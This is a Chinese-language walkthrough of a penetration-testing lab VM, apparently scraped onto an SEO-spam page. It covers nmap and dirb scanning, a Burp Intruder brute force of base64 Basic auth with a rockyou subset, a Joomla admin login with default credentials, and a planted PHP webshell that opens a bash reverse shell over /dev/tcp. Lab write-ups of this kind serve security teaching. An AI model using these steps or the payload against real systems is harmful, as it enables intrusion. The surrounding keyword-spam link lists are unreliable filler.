当前位置: 首页 > wzjs >正文

商城网站建设模板下载seo关键词优化排名外包

商城网站建设模板下载,seo关键词优化排名外包,手机靓号网站制作,游戏开发用什么语言1.开启靶机,确保网络适配器是NAT网段 2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169 nmap -O 192.168.139.1/24 3.访问该IP地址 4.访问robots.txt,什么也没有 5.扫描目录 dirb http://192.168.139.169 6.访问一下secret.txt 7.访问phpinfo.p…

1.开启靶机,确保网络适配器是NAT网段

2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169

nmap -O 192.168.139.1/24

3.访问该IP地址

4.访问robots.txt,什么也没有

5.扫描目录

dirb http://192.168.139.169

6.访问一下secret.txt

7.访问phpinfo.php

8.访问8080,尝试爆破这个密码

9.打开BP抓包,发现是base64编码

10.在secret.txt发现一些有用信息,要在kali里面进行操作

cd /usr/share/wordlists
ls
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt
复制字典的前一百个生成一个txt,后面爆破用。

11.打开BP进行抓包,抓8080端口的包

12.发送到Intrder模块进行爆破,开始攻击

爆破出状态码200,然后解码,账号密码为joker:hannah

13.进行登录

14.登陆成功可以发现该网站是由joomla架构,尝试使用默认账号密码joomla

15.点击后台管理系统

16.用户名和密码joomla

17.可以看到这是他网站的一些模板

18.这里可以新建文件

19.新建666.php写入木马,利用菜刀或者蚁剑进行链接

<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");?>

20.利用kali监听

21.访问http://192.168.139.169:8080/templates/beez3/666.php

回到kali查看是否监听到

http://www.dtcms.com/wzjs/463310.html

相关文章:

  • 云南云岭建设集团官方网站深圳网络seo推广
  • 优秀个人博客网站百度推广员工工资怎么样
  • 电商网站seo方案怎样建立一个自己的网站
  • 西宁人大网站建设百度联盟项目看广告挣钱
  • 个人网站设计介绍文字百家港 seo服务
  • wordpress免费主题网站优化网络软件
  • 电子商务网站推广策略主要内容广告推销网站
  • 武汉市人民政府网站百度排行榜风云
  • 相关网站查询免费建站有哪些
  • 爱站攻略如何做好网络销售技巧
  • 网站开发工具安卓版黄页网站推广app咋做广告
  • 天津做网站的网络公司营销型网站建设推广
  • 阿里云wordpress邮件福州seo排名优化
  • 做男性服装的网站合肥网站推广电话
  • 提出网站推广途径和推广要点宁波seo外包引流推广
  • 网站建设SEO优化哪家好百度快照怎么看
  • 网站建设岗位主要做什么搜索引擎优化服务公司哪家好
  • 安卓优化大师app下载seo引擎优化怎么做
  • wordpress 页面分页重庆做网络优化公司电话
  • 如何提高网站排名谷歌浏览器网页版入口手机版
  • 网站的论坛怎么做凡科建站怎么导出网页
  • 农林网站建设seo关键词排名优化报价
  • 石家庄做网站下载百度app最新版到桌面
  • 网络营销导向型企业网站建设的原则网络营销模式有哪些类型
  • 成都装修设计公司网站百度网址安全检测中心
  • 新乡市建设工程网站温州网站建设开发
  • 国内最大c2c网站搜索引擎seo如何优化
  • 福建微网站建设网站推广优化排名
  • win2008r2 iis配置网站sem代运营托管公司
  • 豪华网站建设市场调研报告最佳范文